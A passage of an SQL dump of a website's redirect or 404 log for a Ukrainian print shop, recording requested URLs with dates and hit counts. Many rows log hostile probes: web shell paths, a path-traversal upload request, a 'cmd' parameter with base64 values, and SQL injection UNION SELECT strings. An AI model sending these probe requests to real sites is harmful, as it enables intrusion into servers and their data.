11:23:42','0000-00-00 00:00:00',301),(12011,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-47.jpg',NULL,'','',1,0,'2017-11-02 11:23:42','0000-00-00 00:00:00',301),(12012,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-42.jpg',NULL,'','',1,0,'2017-11-02 11:23:43','0000-00-00 00:00:00',301),(12013,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-43.jpg',NULL,'','',1,0,'2017-11-02 11:23:43','0000-00-00 00:00:00',301),(12014,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-44.jpg',NULL,'','',1,0,'2017-11-02 11:23:43','0000-00-00 00:00:00',301),(12015,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-39.jpg',NULL,'','',1,0,'2017-11-02 11:23:43','0000-00-00 00:00:00',301),(12016,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-40.jpg',NULL,'','',1,0,'2017-11-02 11:23:43','0000-00-00 00:00:00',301),(12017,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-41.jpg',NULL,'','',1,0,'2017-11-02 11:23:43','0000-00-00 00:00:00',301),(12018,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-36.jpg',NULL,'','',1,0,'2017-11-02 11:23:44','0000-00-00 00:00:00',301),(12019,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-37.jpg',NULL,'','',1,0,'2017-11-02 11:23:44','0000-00-00 00:00:00',301),(12020,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-38.jpg',NULL,'','',1,0,'2017-11-02 11:23:44','0000-00-00 00:00:00',301),(12021,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-33.jpg',NULL,'','',1,0,'2017-11-02 11:23:44','0000-00-00 00:00:00',301),(12022,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-34.jpg',NULL,'','',1,0,'2017-11-02 11:23:44','0000-00-00 00:00:00',301),(12023,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-35.jpg',NULL,'','',1,0,'2017-11-02 11:23:45','0000-00-00 00:00:00',301),(12024,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-30.jpg',NULL,'','',1,0,'2017-11-02 11:23:45','0000-00-00 00:00:00',301),(12025,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-31.jpg',NULL,'','',1,0,'2017-11-02 11:23:45','0000-00-00 00:00:00',301),(12026,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-32.jpg',NULL,'','',1,0,'2017-11-02 11:23:46','0000-00-00 00:00:00',301),(12027,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-27.jpg',NULL,'','',1,0,'2017-11-02 11:23:46','0000-00-00 00:00:00',301),(12028,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-28.jpg',NULL,'','',1,0,'2017-11-02 11:23:46','0000-00-00 00:00:00',301),(12029,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-29.jpg',NULL,'','',1,0,'2017-11-02 11:23:46','0000-00-00 00:00:00',301),(12030,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-24.jpg',NULL,'','',1,0,'2017-11-02 11:23:47','0000-00-00 00:00:00',301),(12031,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-25.jpg',NULL,'','',1,0,'2017-11-02 11:23:47','0000-00-00 00:00:00',301),(12032,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-26.jpg',NULL,'','',1,0,'2017-11-02 11:23:47','0000-00-00 00:00:00',301),(12033,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-21.jpg',NULL,'','',1,0,'2017-11-02 11:23:47','0000-00-00 00:00:00',301),(12034,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-22.jpg',NULL,'','',1,0,'2017-11-02 11:23:47','0000-00-00 00:00:00',301),(12035,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-23.jpg',NULL,'','',1,0,'2017-11-02 11:23:48','0000-00-00 00:00:00',301),(12036,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-18.jpg',NULL,'','',1,0,'2017-11-02 11:23:48','0000-00-00 00:00:00',301),(12037,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-19.jpg',NULL,'','',1,0,'2017-11-02 11:23:48','0000-00-00 00:00:00',301),(12038,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-20.jpg',NULL,'','',1,0,'2017-11-02 11:23:48','0000-00-00 00:00:00',301),(12039,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-15.jpg',NULL,'','',1,0,'2017-11-02 11:23:48','0000-00-00 00:00:00',301),(12040,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-16.jpg',NULL,'','',1,0,'2017-11-02 11:23:49','0000-00-00 00:00:00',301),(12041,'http://ekvatorprint.com.ua/images/modulnie kartini/РјРє-17.jpg',NULL,'','',1,0,'2017-11-02 11:23:49','0000-00-00 00:00:00',301),(12042,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-11.jpg',NULL,'','',1,0,'2017-11-02 11:23:49','0000-00-00 00:00:00',301),(12043,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-12.jpg',NULL,'','',1,0,'2017-11-02 11:23:49','0000-00-00 00:00:00',301),(12044,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-14.jpg',NULL,'','',1,0,'2017-11-02 11:23:49','0000-00-00 00:00:00',301),(12045,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-9.jpg',NULL,'','',1,0,'2017-11-02 11:23:50','0000-00-00 00:00:00',301),(12046,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-10.jpg',NULL,'','',1,0,'2017-11-02 11:23:50','0000-00-00 00:00:00',301),(12047,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-3.jpg',NULL,'','',1,0,'2017-11-02 11:23:51','0000-00-00 00:00:00',301),(12048,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-4.jpg',NULL,'','',1,0,'2017-11-02 11:23:51','0000-00-00 00:00:00',301),(12049,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-5.jpg',NULL,'','',1,0,'2017-11-02 11:23:51','0000-00-00 00:00:00',301),(12050,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-6.jpg',NULL,'','',1,0,'2017-11-02 11:23:52','0000-00-00 00:00:00',301),(12051,'http://ekvatorprint.com.ua/images/modulnie kartini/РњРљ-7.jpg',NULL,'','',1,0,'2017-11-02 11:23:52','0000-00-00 00:00:00',301),(12052,'http://ekvatorprint.com.ua/components/com_jce/editor/extensions/aggregator/youtube/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-02 11:54:18','0000-00-00 00:00:00',301),(12053,'http://ekvatorprint.com.ua/images/stories/index.php',NULL,'http://site.ru','',1,0,'2017-11-02 12:21:29','0000-00-00 00:00:00',301),(12054,'http://ekvatorprint.com.ua/administrator/components/com_poll/ucqeo.php',NULL,'http://site.ru','',1,0,'2017-11-02 12:48:09','0000-00-00 00:00:00',301),(12055,'http://ekvatorprint.com.ua/includes/vyxsvwg.php',NULL,'http://site.ru','',3,0,'2017-11-02 13:11:04','0000-00-00 00:00:00',301),(12056,'http://ekvatorprint.com.ua/profile/popup-pomo.php',NULL,'http://site.ru','',9,0,'2017-11-02 14:15:42','0000-00-00 00:00:00',301),(12057,'http://ekvatorprint.com.ua/templates/mhqcfpt.php',NULL,'http://site.ru','',1,0,'2017-11-02 14:16:58','0000-00-00 00:00:00',301),(12058,'http://ekvatorprint.com.ua/administrator/components/com_menus/znmwcma.php',NULL,'http://site.ru','',3,0,'2017-11-02 15:26:34','0000-00-00 00:00:00',301),(12059,'http://ekvatorprint.com.ua/images/zjobe.php',NULL,'http://site.ru','',3,0,'2017-11-02 15:26:40','0000-00-00 00:00:00',301),(12060,'http://ekvatorprint.com.ua/components/com_djimageslider/Marvins.php',NULL,'http://site.ru','',1,0,'2017-11-02 15:41:53','0000-00-00 00:00:00',301),(12061,'http://ekvatorprint.com.ua/libraries/gantry/admin/widgets/xtloosj.php',NULL,'http://site.ru','',2,0,'2017-11-02 16:26:08','0000-00-00 00:00:00',301),(12062,'http://ekvatorprint.com.ua/vmfilesinvoices/orajy.php',NULL,'http://site.ru','',1,0,'2017-11-02 16:41:59','0000-00-00 00:00:00',301),(12063,'http://ekvatorprint.com.ua/components/com_mailto/views/mailto/yuekd.php',NULL,'http://site.ru','',2,0,'2017-11-02 17:10:08','0000-00-00 00:00:00',301),(12064,'http://ekvatorprint.com.ua/media/jui/img/bixck.php',NULL,'http://site.ru','',6,0,'2017-11-02 17:17:31','0000-00-00 00:00:00',301),(12065,'http://ekvatorprint.com.ua/plugins/system/vblrxyk.php',NULL,'http://site.ru','',3,0,'2017-11-02 17:27:00','0000-00-00 00:00:00',301),(12066,'http://ekvatorprint.com.ua/images/images/enisej-ob-enisej/Matusale/wghqffm.php',NULL,'http://site.ru','',5,0,'2017-11-02 17:27:37','0000-00-00 00:00:00',301),(12067,'http://ekvatorprint.com.ua/media/system_infos.php',NULL,'http://site.ru','',4,0,'2017-11-02 18:00:18','0000-00-00 00:00:00',301),(12068,'http://ekvatorprint.com.ua/upholsterynet.com/logo_img.php',NULL,'http://site.ru','',1,0,'2017-11-02 23:28:09','0000-00-00 00:00:00',301),(12069,'http://ekvatorprint.com.ua/tmp/system_infos.php',NULL,'http://site.ru','',7,0,'2017-11-03 00:14:58','0000-00-00 00:00:00',301),(12070,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart/assets/js/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-03 00:41:22','0000-00-00 00:00:00',301),(12071,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart/assets/js/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-03 00:41:22','0000-00-00 00:00:00',301),(12072,'http://ekvatorprint.com.ua/administrator/images/hziyfa.php',NULL,'http://site.ru','',2,0,'2017-11-03 02:00:01','0000-00-00 00:00:00',301),(12073,'http://ekvatorprint.com.ua/libraries/fof/less/parser/pixfaxx.php',NULL,'http://site.ru','',1,0,'2017-11-03 03:02:50','0000-00-00 00:00:00',301),(12074,'http://ekvatorprint.com.ua/xmlrpc/header_img.php',NULL,'http://site.ru','',2,0,'2017-11-03 03:09:14','0000-00-00 00:00:00',301),(12075,'http://ekvatorprint.com.ua/cmscore/logo_img.php',NULL,'http://site.ru','',1,0,'2017-11-03 03:51:34','0000-00-00 00:00:00',301),(12076,'http://ekvatorprint.com.ua/plugins/vmpayment/klikandpay/klikandpay/assets/js/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-03 04:45:52','0000-00-00 00:00:00',301),(12077,'http://ekvatorprint.com.ua/administrator/components/com_modules/helpers/mdexer.php',NULL,'http://site.ru','',1,0,'2017-11-03 06:56:43','0000-00-00 00:00:00',301),(12078,'http://ekvatorprint.com.ua/tmp/headers_img.php',NULL,'http://site.ru','',5,0,'2017-11-03 07:42:25','0000-00-00 00:00:00',301),(12079,'http://ekvatorprint.com.ua/administrator/components/com_hikashop/extensions/plg_hikashop_out_of_stock/htaccess.php',NULL,'http://site.ru','',3,0,'2017-11-03 07:55:28','0000-00-00 00:00:00',301),(12080,'http://ekvatorprint.com.ua/components/com_content/views/category/.message.php',NULL,'http://site.ru','',2,0,'2017-11-03 09:14:04','0000-00-00 00:00:00',301),(12081,'http://ekvatorprint.com.ua/administrator/help/jubpzqj.php',NULL,'http://site.ru','',1,0,'2017-11-03 09:28:48','0000-00-00 00:00:00',301),(12082,'http://ekvatorprint.com.ua/administrator/components/com_media/qmuvpgi.php',NULL,'http://site.ru','',4,0,'2017-11-03 10:04:41','0000-00-00 00:00:00',301),(12083,'http://ekvatorprint.com.ua/images/xcptjk.php',NULL,'http://site.ru','',2,0,'2017-11-03 10:10:25','0000-00-00 00:00:00',301),(12084,'http://ekvatorprint.com.ua/tmp/i.php',NULL,'http://site.ru','',5,0,'2017-11-03 10:27:00','0000-00-00 00:00:00',301),(12085,'http://ekvatorprint.com.ua/components/com_kunena/controller/application/misc/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-03 11:56:23','0000-00-00 00:00:00',301),(12086,'http://ekvatorprint.com.ua/toolsa/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-11-03 12:29:06','0000-00-00 00:00:00',301),(12087,'http://ekvatorprint.com.ua/administrator/components/com_categories/ofnna.php',NULL,'http://site.ru','',2,0,'2017-11-03 13:45:22','0000-00-00 00:00:00',301),(12088,'http://ekvatorprint.com.ua/components/com_kunena/controller/application/misc/default/htaccess.php',NULL,'http://site.ru','',3,0,'2017-11-03 14:44:48','0000-00-00 00:00:00',301),(12089,'http://ekvatorprint.com.ua/administrator/components/com_hello/feedback.php',NULL,'http://site.ru','',6,0,'2017-11-03 15:26:42','0000-00-00 00:00:00',301),(12090,'http://ekvatorprint.com.ua/mambots/system/config.php',NULL,'http://site.ru','',1,0,'2017-11-03 15:53:05','0000-00-00 00:00:00',301),(12091,'http://ekvatorprint.com.ua/plugins/finder/categories/tmhtvp.php',NULL,'http://site.ru','',2,0,'2017-11-03 17:38:50','0000-00-00 00:00:00',301),(12092,'http://ekvatorprint.com.ua/administrator/components/com_config/dqaxli.php',NULL,'http://site.ru','',2,0,'2017-11-03 20:18:08','0000-00-00 00:00:00',301),(12093,'http://ekvatorprint.com.ua/usi.php',NULL,'http://site.ru','',6,0,'2017-11-03 21:30:04','0000-00-00 00:00:00',301),(12094,'http://ekvatorprint.com.ua/includes/js/tabs/log.php',NULL,'http://site.ru','',3,0,'2017-11-03 23:20:07','0000-00-00 00:00:00',301),(12095,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/toor.php',NULL,'http://site.ru','',5,0,'2017-11-04 00:40:03','0000-00-00 00:00:00',301),(12096,'http://ekvatorprint.com.ua/plugins/system/ldqza.php',NULL,'http://site.ru','',1,0,'2017-11-04 00:46:48','0000-00-00 00:00:00',301),(12097,'http://ekvatorprint.com.ua/xmlrpc/includes/bddzgn.php',NULL,'http://site.ru','',1,0,'2017-11-04 01:05:08','0000-00-00 00:00:00',301),(12098,'http://ekvatorprint.com.ua/includes/bpkoxj.php',NULL,'http://site.ru','',3,0,'2017-11-04 01:20:34','0000-00-00 00:00:00',301),(12099,'http://ekvatorprint.com.ua/modules/mod_articles_latest/jkifzdf.php',NULL,'http://site.ru','',3,0,'2017-11-04 01:24:51','0000-00-00 00:00:00',301),(12100,'http://ekvatorprint.com.ua/modules/mod_custom/tmpl/map.php',NULL,'http://site.ru','',3,0,'2017-11-04 04:48:31','0000-00-00 00:00:00',301),(12101,'http://ekvatorprint.com.ua/components/com_wrapper/qoejkya.php',NULL,'http://site.ru','',2,0,'2017-11-04 15:02:08','0000-00-00 00:00:00',301),(12102,'http://ekvatorprint.com.ua/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css','',2,0,'2017-11-05 14:15:42','0000-00-00 00:00:00',301),(12103,'http://ekvatorprint.com.ua/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=1\'\"',NULL,'','',2,0,'2017-11-06 12:14:28','0000-00-00 00:00:00',301),(12104,'http://ekvatorprint.com.ua/index.php/weblinks-categories?id=\\',NULL,'','',1,0,'2017-11-09 15:08:07','0000-00-00 00:00:00',301),(12105,'http://ekvatorprint.com.ua/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',2,0,'2017-11-10 01:30:47','0000-00-00 00:00:00',301),(12106,'http://ekvatorprint.com.ua/wp-content/uploads/cache.php',NULL,'http://www.googlebot.com/bot.html','',3,0,'2017-11-10 15:22:20','0000-00-00 00:00:00',301),(12107,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/cache.php',NULL,'http://www.googlebot.com/bot.html','',2,0,'2017-11-10 15:22:21','0000-00-00 00:00:00',301),(12108,'http://ekvatorprint.com.ua/wp-content/plugins/Login-wall-etgFB/login_wall.php?login=cmd&z3=Y2FjaGUucGhw&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'ekvatorprint.com.ua','',3,0,'2017-11-10 15:22:22','0000-00-00 00:00:00',301),(12109,'http://ekvatorprint.com.ua/wp-content/plugins/cache.php',NULL,'http://www.googlebot.com/bot.html','',3,0,'2017-11-10 15:22:23','0000-00-00 00:00:00',301),(12110,'http://ekvatorprint.com.ua/sites/all/libraries/elfinder/files/cache.php',NULL,'http://www.googlebot.com/bot.html','',3,0,'2017-11-10 15:22:23','0000-00-00 00:00:00',301),(12111,'http://ekvatorprint.com.ua/wp-content/uploads/files/guest/cache.php',NULL,'http://www.googlebot.com/bot.html','',2,0,'2017-11-10 15:22:24','0000-00-00 00:00:00',301),(12112,'http://ekvatorprint.com.ua/wp-content/uploads/2017/11/cache.php',NULL,'http://www.googlebot.com/bot.html','',3,0,'2017-11-10 15:22:24','0000-00-00 00:00:00',301),(12113,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/cache.php',NULL,'http://www.googlebot.com/bot.html','',2,0,'2017-11-10 15:22:25','0000-00-00 00:00:00',301),(12114,'http://ekvatorprint.com.ua/delivery@20',NULL,'http://ekvatorprint.com.ua/delivery%4020','',1,0,'2017-11-10 20:46:16','0000-00-00 00:00:00',301),(12115,'http://ekvatorprint.com.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','',3,0,'2017-11-11 18:41:09','0000-00-00 00:00:00',301),(12116,'http://ekvatorprint.com.ua/printing-on-canvas карта',NULL,'','',1,0,'2017-11-12 19:11:52','0000-00-00 00:00:00',301),(12117,'http://ekvatorprint.com.ua/modules/mod_fxprev/libraries/tmpl.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-11-13 07:27:30','0000-00-00 00:00:00',301),(12118,'http://ekvatorprint.com.ua/wp-content/themes/famous/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/famous/style.css','',4,0,'2017-11-13 15:41:53','0000-00-00 00:00:00',301),(12119,'http://ekvatorprint.com.ua/kak_podtverdit_oplaty_za_zakaz',NULL,'','',1,0,'2017-11-14 13:43:26','0000-00-00 00:00:00',301),(12120,'http://ekvatorprint.com.ua/kak-podtverdit-oplaty-za-zakaz',NULL,'','',1,0,'2017-11-14 13:44:23','0000-00-00 00:00:00',301),(12121,'http://ekvatorprint.com.ua/administrator/components/com_categories/ofnna.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-14 14:33:26','0000-00-00 00:00:00',301),(12122,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_menus/item/htaccess.php',NULL,'http://site.ru','',3,0,'2017-11-14 14:47:30','0000-00-00 00:00:00',301),(12123,'http://ekvatorprint.com.ua/components/com_search/models/mark.php.suspected',NULL,'http://site.ru','',2,0,'2017-11-14 14:48:03','0000-00-00 00:00:00',301),(12124,'http://ekvatorprint.com.ua/tmp/x.php',NULL,'http://site.ru','',4,0,'2017-11-14 14:49:13','0000-00-00 00:00:00',301),(12125,'http://ekvatorprint.com.ua/baws.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-14 16:05:04','0000-00-00 00:00:00',301),(12126,'http://ekvatorprint.com.ua/info.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-14 16:05:55','0000-00-00 00:00:00',301),(12127,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/images/ws0.php',NULL,'http://site.ru','',2,0,'2017-11-14 16:07:36','0000-00-00 00:00:00',301),(12128,'http://ekvatorprint.com.ua/marvins.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-14 16:08:42','0000-00-00 00:00:00',301),(12129,'http://ekvatorprint.com.ua/content-post.php.suspected',NULL,'http://site.ru','',3,0,'2017-11-14 16:35:32','0000-00-00 00:00:00',301),(12130,'http://ekvatorprint.com.ua/js.php.suspected',NULL,'http://site.ru','',4,0,'2017-11-14 19:35:47','0000-00-00 00:00:00',301),(12131,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_cache/purge/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-14 19:55:00','0000-00-00 00:00:00',301),(12132,'http://ekvatorprint.com.ua/modules/mod_articles_category/media-views-rtl.php',NULL,'http://site.ru','',1,0,'2017-11-14 21:04:37','0000-00-00 00:00:00',301),(12133,'http://ekvatorprint.com.ua/jemobile.php.suspected',NULL,'http://site.ru','',3,0,'2017-11-14 21:09:16','0000-00-00 00:00:00',301),(12134,'http://ekvatorprint.com.ua/administrator/templates/hathor/html/com_modules/positions/htaccess.php',NULL,'http://site.ru','',3,0,'2017-11-15 02:06:30','0000-00-00 00:00:00',301),(12135,'http://ekvatorprint.com.ua/usi.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-15 02:14:54','0000-00-00 00:00:00',301),(12136,'http://ekvatorprint.com.ua/htaccess.php.suspected',NULL,'http://site.ru','',5,0,'2017-11-15 02:35:36','0000-00-00 00:00:00',301),(12137,'http://ekvatorprint.com.ua/libraries/joomla/template/mark.php.suspected',NULL,'http://site.ru','',2,0,'2017-11-15 03:15:29','0000-00-00 00:00:00',301),(12138,'http://ekvatorprint.com.ua/mrswenvsr.php.suspected',NULL,'http://site.ru','',2,0,'2017-11-15 03:28:08','0000-00-00 00:00:00',301),(12139,'http://ekvatorprint.com.ua/templates/atomic/error.php.suspected',NULL,'http://site.ru','',3,0,'2017-11-15 05:00:12','0000-00-00 00:00:00',301),(12140,'http://ekvatorprint.com.ua/authorize.php.suspected',NULL,'http://site.ru','',2,0,'2017-11-15 05:52:33','0000-00-00 00:00:00',301),(12141,'http://ekvatorprint.com.ua/sec.php.suspected',NULL,'http://site.ru','',4,0,'2017-11-15 05:59:04','0000-00-00 00:00:00',301),(12142,'http://ekvatorprint.com.ua/wss.php.suspected',NULL,'http://site.ru','',3,0,'2017-11-15 06:09:20','0000-00-00 00:00:00',301),(12143,'http://ekvatorprint.com.ua/http://ekvatorprint.com.ua/images/oplata_za_zakaz/vze yslygi_arhiv.jpg',NULL,'','',48,0,'2017-11-15 15:48:30','0000-00-00 00:00:00',301),(12144,'http://ekvatorprint.com.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','',3,0,'2017-11-16 19:50:22','0000-00-00 00:00:00',301),(12145,'http://ekvatorprint.com.ua/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','',2,0,'2017-11-17 17:12:03','0000-00-00 00:00:00',301),(12146,'http://ekvatorprint.com.ua/rss.xml',NULL,'','',4,0,'2017-11-19 01:39:25','0000-00-00 00:00:00',301),(12147,'http://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',4,0,'2017-11-19 01:39:25','0000-00-00 00:00:00',301),(12148,'http://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',NULL,'','',4,0,'2017-11-19 01:39:26','0000-00-00 00:00:00',301),(12149,'http://ekvatorprint.com.ua/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',4,0,'2017-11-19 01:39:26','0000-00-00 00:00:00',301),(12150,'http://ekvatorprint.com.ua/components/com_foxcontact/_func.php?X=Attacker',NULL,'','',2,0,'2017-11-19 01:39:26','0000-00-00 00:00:00',301),(12151,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/XAttacker.php?X=Attacker',NULL,'','',4,0,'2017-11-19 01:39:26','0000-00-00 00:00:00',301),(12152,'http://ekvatorprint.com.ua/bcpbdede/inc/grouplist.txt',NULL,'','',1,0,'2017-11-19 04:38:21','0000-00-00 00:00:00',301),(12153,'http://ekvatorprint.com.ua/dede/inc/grouplist.txt',NULL,'','',2,0,'2017-11-19 04:38:22','0000-00-00 00:00:00',301),(12154,'http://ekvatorprint.com.ua/agdjadmin/inc/grouplist.txt',NULL,'','',1,0,'2017-11-19 04:38:28','0000-00-00 00:00:00',301),(12155,'http://ekvatorprint.com.ua/admin/inc/grouplist.txt',NULL,'','',2,0,'2017-11-19 04:38:29','0000-00-00 00:00:00',301),(12156,'http://ekvatorprint.com.ua/css/bootstrap-3.3.5.min.css',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl','',1,0,'2017-11-20 15:10:04','0000-00-00 00:00:00',301),(12157,'http://ekvatorprint.com.ua/js/jquery-2.1.4.min.js',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl','',1,0,'2017-11-20 15:10:04','0000-00-00 00:00:00',301),(12158,'http://ekvatorprint.com.ua/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox.css',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/css/jquery.lightbox.css','',4,0,'2017-11-20 21:18:06','0000-00-00 00:00:00',301),(12159,'http://ekvatorprint.com.ua/wp-includes/wp-pages.lib.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-11-21 02:14:53','0000-00-00 00:00:00',301),(12160,'http://ekvatorprint.com.ua/wss.php',NULL,'http://site.ru','',3,0,'2017-11-21 16:05:18','0000-00-00 00:00:00',301),(12161,'http://ekvatorprint.com.ua/postnew/popup-pomo.php',NULL,'http://site.ru','',10,0,'2017-11-21 16:22:06','0000-00-00 00:00:00',301),(12162,'http://ekvatorprint.com.ua/\'banner-printing\'',NULL,'','',1,0,'2017-11-21 20:11:20','0000-00-00 00:00:00',301),(12163,'http://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттернаяподрезкавЭкваторПринт-fill-530x530.png',NULL,'https://slack.com','',1,0,'2017-11-23 13:48:58','0000-00-00 00:00:00',301),(12164,'http://ekvatorprint.com.ua/abc.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-11-23 15:28:17','0000-00-00 00:00:00',301),(12165,'http://ekvatorprint.com.ua/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','',2,0,'2017-11-28 21:50:40','0000-00-00 00:00:00',301),(12166,'http://ekvatorprint.com.ua/upxx.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-11-29 07:47:07','0000-00-00 00:00:00',301),(12167,'http://ekvatorprint.com.ua/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','',1,0,'2017-11-29 15:08:11','0000-00-00 00:00:00',301),(12168,'http://ekvatorprint.com.ua/modules/attributewizardpro/file_upload.php',NULL,'','',1,0,'2017-11-29 15:26:42','0000-00-00 00:00:00',301),(12169,'http://ekvatorprint.com.ua/modules/mod_phocagallery_image/mod_phocagallery_image.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-11-29 16:25:59','0000-00-00 00:00:00',301),(12170,'http://ekvatorprint.com.ua/cache/index.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-11-30 08:25:50','0000-00-00 00:00:00',301),(12171,'http://ekvatorprint.com.ua/wp-includes/LICENSE.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-12-01 12:14:11','0000-00-00 00:00:00',301),(12172,'http://ekvatorprint.com.ua/index.php?page=shop.recommend&product_id=1&pop=1&tmpl=component&option=com_virtuemart&Itemid=1',NULL,'http://ekvatorprint.com.ua/index.php?page=shop.recommend&product_id=1&pop=1&tmpl=component&option=com_virtuemart&Itemid=1','',3,0,'2017-12-02 00:59:15','0000-00-00 00:00:00',301),(12173,'http://ekvatorprint.com.ua/dumper/dumper.php',NULL,'','',1,0,'2017-12-02 19:41:57','0000-00-00 00:00:00',301),(12174,'http://ekvatorprint.com.ua/wp-content/plugins/wp-symposium/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-symposium/readme.txt','',4,0,'2017-12-02 22:50:37','0000-00-00 00:00:00',301),(12175,'http://ekvatorprint.com.ua/full_article.php?title=Eoghan Ruadh � S�illeabh��n&article_id=1+AND+1=2+UNION+SELECT+injecthere,injecthere,injecthere,injecthere,injecthere--',NULL,'','',1,0,'2017-12-04 10:56:13','0000-00-00 00:00:00',301),(12176,'http://ekvatorprint.com.ua/page2.php?30=&act=menupage&menuid=&menu=1+AND+1=2+UNION+SELECT+1,2,3,4,injecthere,injecthere,injecthere,8--',NULL,'','',1,0,'2017-12-04 10:56:14','0000-00-00 00:00:00',301),(12177,'http://ekvatorprint.com.ua/showroom-gallery.php?ID=13&pageNum_currentphoto=55&gallery=1+AND+1=2+UNION+SELECT+injecthere,2,injecthere,4,5,6,7--',NULL,'','',1,0,'2017-12-04 10:56:15','0000-00-00 00:00:00',301),(12178,'http://ekvatorprint.com.ua/projedetay.php?ID=1+AND+1=2+UNION+SELECT+injecthere,injecthere,injecthere,injecthere,5,injecthere,injecthere,injecthere,9,10,11,12,injecthere,14,15--',NULL,'','',1,0,'2017-12-04 10:56:17','0000-00-00 